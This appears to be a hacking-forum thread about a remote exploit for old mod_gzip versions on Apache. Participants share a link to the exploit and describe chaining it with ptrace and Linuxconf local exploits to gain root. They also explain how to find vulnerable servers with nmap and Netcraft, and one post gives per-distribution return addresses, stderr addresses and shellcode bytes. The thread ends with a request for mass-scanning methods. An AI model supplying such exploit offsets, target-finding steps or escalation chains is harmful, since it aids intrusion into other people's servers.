PRIVATE and now PUBLIC !!!

mod_gzip (with debug_mode) <= 1.2.26.1a Remote Exploit

http://www.k-otik.net/exploits/11.20.85mod_gzip.c.php

enjoy

did you read the code?

it's NOT a root sploit... *g*

so...? there are many ways of getting root on machines like the common ptrace exploit or the new linuxconf exploit to create a buffer overflow so that you can use the ptrace one if it is usually bloacked by antivirus or some shit....

i compiled it and it seems to work... but how do i scan for websites with mod_gzip enabled?

hmm, just a portscanner that scans the port response, like the last nmap release with the -sV flag


nmap -sV -O -v -P0 host


u can find the OS, and the services running on the remote host
so, just pay attention to the port 80 output, and see if exists any (mod_gzip) or some think like that..














btw, does anybody knows hoe to get more target offset's?

cumps[[]]

Where I can find more working offsets for with exploit?

QUOTE

but how do i scan for websites with mod_gzip enabled?


It is possible to try so: www.netcraft.com

Webserver Search
What's that site running?...

www.dream-seed.com Search ....

http://uptime.netcraft.com/up/graph/?host=www.dream-seed.com

OS - Linux
Apache/1.3.27 (Unix) (Vine/Linux) PHP/4.3.3 mod_gzip/1.3.26.1a mod_layout/3.2.1

The version of mod_gzip would have to be quite old for this exploit to work...It probably won't get you anywhere guys.


-Shaun.

is there any chance someone can improve this exploit a notch and post it here? i would do it but... i dont know C at all!

unfortunately i dont know what the hell i talk about usually...
ummm please forgive me blunt ignorance, i am used to running ptrace exploits on redhat 7.2 or 7.3 boxes and actually getting them to work...
so that about sums up my knowledge in linux exploits... the linux conf exploit that i speak of is:
* Linuxconf <= 1.28r3 local xploit
* by RaiSe <raise@netsearch-ezine.com>

can be viewed here

this is for RedHat 7.3 and Mandrake 8.0 and 8.2 dist.

so thats about it ....
on boxes that the ptrace gets killed (i dont know by what, could be privleges or whatever) i use the linuxconf one to create the buffer overflow which doesn't get me root and then i open the ptrace exploit again and it attatches the shellcode perfectly...

so skyline im sorry if i didnt make any sense to anyone i apologize for my ignorance....

j0 girls i found some offsets....

here ya go...

{"RedHat 9.0", // flavour info
0xbfffc8a2, // ret_addr in stack
0x31823610, // address of stderr

"\xbb\xaa\x1b\xa5\xa1\x81\xc3\x71\x71\x71\x71\xff\xe3"


{"RedHat 8.0", // flavour info
0xbfffd8f0, // ret_addr in stack
0x42127480, // address of stderr

"\xbb\xaa\x1b\xa5\xa1\x81\xc3\x66\x66\x66\x66\xff\xe3"


{"RedHat 7.3", // flavour info
0xbffcf610, // ret_addr in stack
0x42131806, // address of stderr

"\xbb\xaa\x1b\xa5\xa1\x81\xc3\x66\x66\x66\x66\xff\xe3"


{"SuSe 8.1", // flavour info
0xbfc917c0, // ret_add in stack
0x58184617, // address of stderr

"\xbb\xaa\x1b\xa5\xa1\x81\xc3\x63\x63\x63\x63\xff\xe3"


{"Mandrake 9.1", // flavour info
0xbc04172f, // ret_add in stack
0x41196735, // address of stderr

"\xbb\xaa\x1b\xa5\xa1\x81\xc3\x49\x49\x49\x49\xff\xe3"

have fun

thanks for the offsets...
anyone know how to scan for this? like i mean MASS scanning?